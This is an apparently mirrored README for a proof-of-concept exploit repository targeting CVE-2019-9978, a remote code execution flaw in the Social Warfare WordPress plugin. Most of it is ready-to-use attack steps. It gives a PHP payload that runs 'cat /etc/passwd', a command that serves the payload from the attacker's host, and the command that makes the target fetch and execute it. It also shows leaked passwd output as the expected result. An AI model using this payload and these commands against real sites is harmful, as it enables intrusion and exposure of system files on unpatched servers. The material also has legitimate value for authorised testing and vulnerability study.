来源

关联漏洞

描述

A Remote Code Execution (RCE) vulnerability in the Social Warfare plugin for WordPress, affecting versions below 3.5.3.

介绍

# CVE-2019-9978 - Social Warfare WordPress Plugin RCE < 3.5.3

A Remote Code Execution (RCE) vulnerability in the **Social Warfare** plugin for WordPress, affecting all versions below **3.5.3**.

---

## 💡 Motivation

The original public exploit was written in an outdated version of Python and no longer runs properly in modern environments.  
I rewrote the exploit to be fully compatible with **Python 3**, making it easier to use, understand, and integrate into modern tooling.

---

## Proof of Concept (PoC)

### ✅ Step 1 – Create the Payload

Create a file named `payload.txt` with the following content:

```html
<pre>system('cat /etc/passwd')</pre>
```

---

### ✅ Step 2 – Start a Python HTTP Server

Use Python to serve your payload:

```bash
python3 -m http.server 8000
```

This will make your `payload.txt` accessible at:

```
http://<your-ip>:8000/payload.txt
```

---

### ✅ Step 3 – Run the Exploit

```bash
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt
```

---

### Expected Output

If the target is vulnerable, you will receive output similar to:

```
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```

---

## Screenshots


### HTTP Server Receives Request

![http-server](https://github.com/user-attachments/assets/29c63c20-48dc-49f9-ae5d-9fc3aedcde8f)


### Successful Exploit Execution

![exploit](https://github.com/user-attachments/assets/209fb5a8-4737-4bf9-8700-fc169e1a7833)




### Payload File Content

![payload](https://github.com/user-attachments/assets/24293c44-b3b9-4891-a2d9-25bb8612ac5b)



---

##  Technical Details

- **Plugin:** Social Warfare
- **Affected Versions:** `< 3.5.3`
- **CVE:** [CVE-2019-9978](https://www.exploit-db.com/exploits/46794)
- **Vulnerability Type:** Remote Code Execution (RCE)
- **Original Author:** [@hash3liZer](https://github.com/hash3liZer/CVE-2019-9978)
- **Researcher:** Luka Sikic

---

##  Credits

- **Exploit Author:** [@hash3liZer](https://github.com/hash3liZer)  
- **Python 3 Rework:** [@echosso](https://www.linkedin.com/in/oussama-larhnimi-8a1a01b8/) 



---

> ⚠️ **Disclaimer**: This repository is for educational and ethical testing purposes only.  
> Unauthorized use of this exploit against systems you do not own is strictly prohibited.

文件快照

 [4.0K]  /data/pocs/a4a776f2b4c8bfed09a49f95c6f3cb19237a9666
├── [2.0K]  CVE-2019-9978.py
├── [ 11K]  LICENSE
├── [  37]  payload.txt
└── [2.4K]  README.md

0 directories, 4 files

备注